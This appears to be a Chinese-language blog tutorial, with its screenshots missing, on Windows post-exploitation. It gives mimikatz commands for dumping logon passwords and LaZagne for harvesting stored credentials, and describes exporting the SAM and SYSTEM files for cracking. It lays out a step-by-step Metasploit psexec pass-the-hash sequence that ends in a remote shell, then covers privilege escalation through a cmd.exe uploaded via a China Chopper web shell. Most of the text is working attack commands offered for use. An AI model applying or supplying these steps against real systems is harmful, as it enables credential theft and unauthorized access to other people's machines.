只能搞个阉割版,不放工具了。我这里分开成两个部分传
mimikatz读密码:
privilege::debug //提升权限
sekurlsa::logonpassWords //抓取密码
xp不支持而已,win7可以
laZagne.exe读取密码:
linux,windows都支持
选项:
效果:
laZagne.exe all >>1.txt #导出结果
高版本2016,2012则可以读取hash,比如Pwdump7
彩虹表:
kali自带
字典很大,速度很快,pojie纯数字很快:
导出windows的SAM,system文件,导入kali,Crack pojie。
kali的msf,利用hash远程登录系统:
针对无法读出的密码
要kali2.0,博主之前装失败了不再演示
msfconsole
msf > use exploit/windows/smb/psexec
msf > set rhost 192.168.1.105
msf > set SMBUser administrator
msf > set SMBPass #接工具读出来的hash
msf > exploit
msf > shell
windows权限提升:
我直接把文件拖进去
用wt.asp看文件夹,文件读写的权限
因为:
找到cmd.exe,拖出来:
拖进菜刀:
执行:setp c:\wmpub\cmd.exe
阔以了:
可以执行命令不能新建用户: